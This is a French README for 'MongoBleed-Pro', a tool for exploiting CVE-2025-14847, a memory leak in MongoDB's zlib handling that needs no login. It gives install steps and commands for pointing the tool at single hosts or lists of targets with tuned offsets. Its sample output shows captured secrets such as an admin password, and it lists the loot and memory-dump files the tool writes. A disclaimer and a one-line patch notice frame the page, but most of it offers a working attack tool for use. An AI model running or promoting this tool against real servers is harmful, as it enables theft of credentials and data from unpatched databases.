
Outil avancé d'exploitation de fuite mémoire MongoDB
Continuez à apprendre | Continuez à hacker avec Alexcyberx
MongoBleed-Pro est un outil d'exploitation avancé pour CVE-2025-14847, une vulnérabilité critique de divulgation mémoire dans la gestion de la compression zlib de MongoDB. Cet outil permet aux chercheurs en sécurité d'extraire des données sensibles à partir d'instances MongoDB vulnérables.
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| Fichier | Description |
|---|---|
loot_<host>.txt | Secrets extraits dans un format lisible |
dump_<host>.bin | Dump mémoire brut pour analyse manuelle |
Si vous êtes administrateur MongoDB, mettez à jour vers les versions corrigées :
alexcyberx
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Si vous avez trouvé cet outil utile, veuillez lui attribuer une ⭐ sur GitHub !
「 Continuez à apprendre | Continuez à hacker 」
Fait avec ❤️ par alexcyberx
| Propriété | Détails |
|---|
| Identifiant CVE | CVE-2025-14847 |
| Type de vulnérabilité | Divulgation mémoire |
| Versions concernées | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Cause racine | Lecture hors limites lors de la décompression zlib |
| Impact | Fuite mémoire distante sans authentification |
| Argument | Description | Défaut |
|---|
--target | IP/URL cible | Invite interactive |
--file | Fichier contenant la liste des cibles | Aucun |
--threads | Nombre de threads | 50 |
--min-offset | Décalage mémoire minimum | 20 |
--max-offset | Décalage mémoire maximum | 8192 |